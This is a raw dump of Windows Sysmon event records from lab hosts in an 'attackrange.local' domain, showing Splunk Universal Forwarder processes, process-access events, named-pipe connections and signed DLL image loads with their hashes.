12:16:09.493{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219404Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:09.493{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219403Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:09.493{AD5E2759-5432-6143-0500-00000000F101}4122828C:\Windows\system32\csrss.exe{AD5E2759-5B09-618E-04CE-08000000F101}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219402Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:09.493{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B09-618E-04CE-08000000F101}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219401Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:09.477{AD5E2759-5B09-618E-04CE-08000000F101}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219400Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:09.320{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FFD48E62B1C45F36AB0F7E942688BBED,SHA256=3D8638A3270750FC642DD9112F6A95C4B9F9573677672B7F2B0FA9934965B2EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000021219399Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:09.008{AD5E2759-5B08-618E-03CE-08000000F101}60484100C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021219431Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:10.883{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DBDBF1DDB736AE57B0F6458BB7697A7,SHA256=1565EC0E89F53C3186F13FC25D5091F77F269AE7D8DF9652ECA01311A19AD08E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000057344946Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.767{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057344945Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.767{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B3B16891EFDCE1A2CE3A93CCE2A0CB0D,SHA256=8B2D8CD7358C4404082128DBAA26F790A0E25587F3AF375274058409CB41E4FEfalsetrue 534500x800000000000000057344944Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.652{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057344943Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.652{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x800000000000000057344942Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.652{8B6011A9-5B0A-618E-3CF3-04000000F101}20766632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344941Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.652{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057344940Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.652{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x800000000000000057344939Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.489{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057344938Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.489{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057344937Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.489{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057344936Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:10.489{8B6011A9-5B0A-618E-3CF3-04000000F101}2076\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057344935Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.489{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057344934Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:10.489{8B6011A9-5B0A-618E-3CF3-04000000F101}2076\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057344933Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.488{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057344932Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.488{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057344931Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.487{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057344930Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.487{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057344929Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057344928Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057344927Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057344926Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057344925Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057344924Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057344923Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057344922Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057344921Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057344920Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057344919Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057344918Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057344917Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057344916Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057344915Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057344914Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057344913Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057344912Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057344911Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057344910Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057344909Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057344908Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057344907Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:10.468{8B6011A9-5B0A-618E-3CF3-04000000F101}2076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 